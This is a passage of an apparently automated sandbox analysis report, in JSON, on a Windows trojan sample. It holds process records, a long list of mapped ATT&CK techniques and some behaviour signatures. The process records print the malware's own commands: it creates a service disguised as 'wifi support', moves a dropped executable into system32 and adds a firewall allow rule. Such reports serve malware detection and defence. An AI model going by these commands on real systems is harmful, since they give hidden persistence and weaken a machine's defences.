"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe", "normalized_path": "C:\\870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe", "sha256": "870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663", "av_label": "Trojan.BrsecmonE", "av_matched": 14, "av_total": 22}, {"uid": "00000000-00005772", "parentuid": "00000000-00005996", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\yucmtnpt\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005964", "parentuid": "00000000-00005996", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\qoxyhdso.exe\" %WINDIR%\\system32\\yucmtnpt\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00002296", "parentuid": "00000000-00005996", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create yucmtnpt binPath= \"%WINDIR%\\system32\\yucmtnpt\\qoxyhdso.exe /d\\\"C:\\870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00006024", "parentuid": "00000000-00005996", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description yucmtnpt \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004312", "parentuid": "00000000-00005996", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start yucmtnpt", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00003080", "parentuid": "00000000-00005996", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00004252", "name": "qoxyhdso.exe", "normalized_path": "%WINDIR%\\system32\\yucmtnpt\\qoxyhdso.exe", "command_line": "/d\"C:\\870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\"", "sha256": "8cb23a302e6571c75febac2a56906904a476c0a5164fa9aa320ada22af518ab9"}, {"uid": "00000000-00003960", "parentuid": "00000000-00004252", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 6, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 5, "informative_identifiers_count": 21}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 3, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\qoxyhdso.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n 